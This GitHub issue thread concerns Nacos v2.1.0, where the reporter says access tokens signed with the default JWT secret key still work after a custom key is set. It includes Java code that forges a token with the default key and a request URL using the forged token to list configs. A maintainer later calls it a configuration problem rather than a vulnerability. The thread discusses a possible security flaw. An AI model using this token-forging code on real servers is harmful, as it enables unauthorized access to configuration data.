【v2.1.0】access_token访问漏洞

[JavaAjust]

Describe the bug
A clear and concise description of what the bug is.
nacos.io/zh-cn/docs/auth.html 按照官网；docker启动进行了如下配置 NACOS_AUTH_ENABLE=true NACOS_AUTH_TOKEN=字符串

NACOS_AUTH_TOKEN并没有生效；还是继续用 默认的secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
使用jwt加密生成access_token，猜可以访问api接口

用自定义的NACOS_AUTH_TOKEN=字符串 生成的access_token访问不了

Expected behavior
A clear and concise description of what you expected to happen.
使用自定义的NACOS_AUTH_TOKEN；生成access_token能够访问api接口

Actually behavior
A clear and concise description of what you actually to happen.
还是需要使用 默认的secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789；生成access_token能够访问api接口

How to Reproduce
Steps to reproduce the behavior:
shell docker run --env PREFER_HOST_MODE=hostname --env MODE=standalone --env NACOS_AUTH_ENABLE=true --env NACOS_AUTH_TOKEN=SecretKey:e472c13e-a568-47cd-bb49-c15e253f62e9 -p 8848:8848 nacos/nacos-server:v2.1.0

Desktop (please complete the following information):

• OS: [e.g. Centos]：centos
• Version [e.g. nacos-server 1.3.1, nacos-client 1.3.1]：v2.1.0
• Module [e.g. naming/config]
• SDK [e.g. original, spring-cloud-alibaba-nacos, dubbo]

Additional context
Add any other context about the problem here.

public static String createToken(String userName) throws IOException {
        long now = System.currentTimeMillis();

        Date validity;

        validity = new Date(now + 18000 * 1000L);

        String raw_key = "SecretKey012345678901234567890123456789012345678901234567890123456789";
        String raw_key222 = "SecretKey:e472c13e-a568-47cd-bb49-c15e253f62e9";
        byte[] key_byte = new BASE64Decoder().decodeBuffer(raw_key);

        Claims claims = Jwts.claims().setSubject(userName);
        return Jwts.builder().setClaims(claims).setExpiration(validity)
                .signWith(Keys.hmacShaKeyFor(key_byte), SignatureAlgorithm.HS256).compact();

    public static void main(String[] args) throws IOException {
            String token = createToken("nacos");
            System.out.println(token);
        }
    }
`

使用生成的access_token访问

http://10.132.9.106:8848/nacos/v1/cs/configs?pageNo=1&pageSize=10&search=accurate&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3MzM0MzA3OX0.7VB3vDekfKEItOMf-0CuMxpvGr43u15KyfwOgIKi1yg&username=nacos

[yunwz]

PRs welcome.

[KomachiSion]

Maybe Fixed in 2.2.0 with #9380

[PRANRAVEE]

พี่หนูต้องส่งให้ที่ไหนต่อในวันที่ อ. 10 ม.ค. 2023 17:08 lihaopeng ***@***.***> เขียนว่า: Describe the bug A clear and concise description of what the bug is. nacos.io/zh-cn/docs/auth.html 按照官网；docker启动进行了如下配置 NACOS_AUTH_ENABLE=true NACOS_AUTH_TOKEN=字符串 NACOS_AUTH_TOKEN并没有生效；还是继续用 默认的secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789 使用jwt加密生成access_token，猜可以访问api接口 用自定义的NACOS_AUTH_TOKEN=字符串 生成的access_token访问不了 Expected behavior A clear and concise description of what you expected to happen. 使用自定义的NACOS_AUTH_TOKEN；生成access_token能够访问api接口 Actually behavior A clear and concise description of what you actually to happen. 还是需要使用 默认的secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789；生成access_token能够访问api接口 How to Reproduce Steps to reproduce the behavior: shell docker run --env PREFER_HOST_MODE=hostname --env MODE=standalone --env NACOS_AUTH_ENABLE=true --env NACOS_AUTH_TOKEN=SecretKey:e472c13e-a568-47cd-bb49-c15e253f62e9 -p 8848:8848 nacos/nacos-server:2.1.0 Desktop (please complete the following information): OS: [e.g. Centos]：centosVersion [e.g. nacos-server 1.3.1, nacos-client 1.3.1]：2.1.0Module [e.g. naming/config]SDK [e.g. original, spring-cloud-alibaba-nacos, dubbo] Additional context Add any other context about the problem here. public static String createToken(String userName) throws IOException { long now = System.currentTimeMillis(); Date validity; validity = new Date(now + 18000 * 1000L); String raw_key = "SecretKey012345678901234567890123456789012345678901234567890123456789"; String raw_key222 = "SecretKey:e472c13e-a568-47cd-bb49-c15e253f62e9"; byte[] key_byte = new BASE64Decoder().decodeBuffer(raw_key); Claims claims = Jwts.claims().setSubject(userName); return Jwts.builder().setClaims(claims).setExpiration(validity) .signWith(Keys.hmacShaKeyFor(key_byte), SignatureAlgorithm.HS256).compact(); }` —Reply to this email directly, view it on GitHub, or unsubscribe.You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

[KomachiSion]

鉴于持续有人问这个issue的问题，

在这里说明下， 这个不是漏洞~, 不是漏洞~ , 不是漏洞~

我使用nacos2.1.0版本在本地启动， 只在token.key后面添加一个'a'字符，开启鉴权后启动测试， 返回接口为403错误 invalid token。

。关于pr fixed是另一个使用问题， 部分token,key会导致生成token失败，导致登录失败。对应pr有说明。

至于本issue提交的漏洞，大概率是用户自己的环境有问题，导致配置未生效。